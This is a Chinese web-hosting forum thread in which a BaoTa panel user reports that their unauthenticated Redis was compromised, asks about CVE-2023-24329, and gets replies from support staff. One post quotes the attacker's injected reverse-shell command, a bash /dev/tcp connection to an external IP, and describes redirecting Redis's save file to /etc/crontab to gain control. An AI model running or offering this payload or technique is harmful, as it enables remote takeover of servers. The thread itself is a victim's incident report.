【已解答】Py3.7.9

本帖最后由堡塔运维小林于 2023-11-3 10:39 编辑

通过python漏洞修改 redis、请问一下怎么处理呢

宝塔用户_aoagjp · 发表于 2023-11-2 17:44:54

我这边使用宝塔出现了这个问题。被别人修改了redis的值

运维小林q3030251644 · 发表于 2023-11-2 17:45:32

您好，这边不是很能理解您的意思，能否具体的描述一下呢

宝塔用户_aoagjp · 发表于 2023-11-2 17:52:39

感谢像这篇文章的情况https://cloud.tencent.com/developer/article/1483850?areaSource=102001.13&traceId=ntx3RQ7EJ8G8SIiTVMlGN 他把我的redis的值修改后，仍了个反弹shell的命令进去。

宝塔用户_aoagjp · 发表于 2023-11-2 17:56:53

CVE-2023-24329 好像这个漏洞也可以修改redis ，你们自带的python修复这个漏洞没

宝塔用户_aoagjp · 发表于 2023-11-2 18:35:25

请问一下有什么处理方式吗

运维小林q3030251644 · 发表于 2023-11-3 10:39:01

您好，这边问了一下负责人，说是面板上面带的python是没有影响的，不会出现这样的一个情况

宝塔用户_aoagjp · 发表于 2023-11-3 11:19:07

发现一个被攻击漏洞，用的宝塔7.9.8版本，redis没有设置密码，但没有开外部端口，黑客通过宝塔面板端口修改redis的值，添加了一段mars **** root bin/sh bash -i >&/dev/tcp/8.137.10.80/4050 0>&1 键值对，然后修改redis保存路径和名字到etc/crontab 。机器就被控制。发现后关闭所有端口排查问题，只要开放宝塔端口，就会被一波带走，通过netstat查看也发现宝塔端口pyrhon3上有国外ip连接。

宝塔技术-小强 · 发表于 2023-11-3 11:35:52

我们默认都是使用的request 包请求的。
并且像url 解析漏洞。也得有一个可控的请求点。才能成为漏洞。

█菠萝云买2送1活动！12G内存99元	阿里云国际低折扣多云自助平台	APP分发-无行业限制免审核	香港CN2物理机8核32G，398元/月	A5招租，联系qq394030111
高防服务器，无视一切流量攻击	【阿里云】宝塔一键部署，低至5折	A8招租，联系qq394030111	【阿里云】宝塔一键部署，低至5折	OV/EV SSL证书，可当日签发
█ 易探云·香港/美国vps仅9元 █	▶CPS云◀海外大带宽vps服务器	OV/EV SSL证书，可当日签发	【云防护】专注域名和网站安全防护	A15招租，联系qq394030111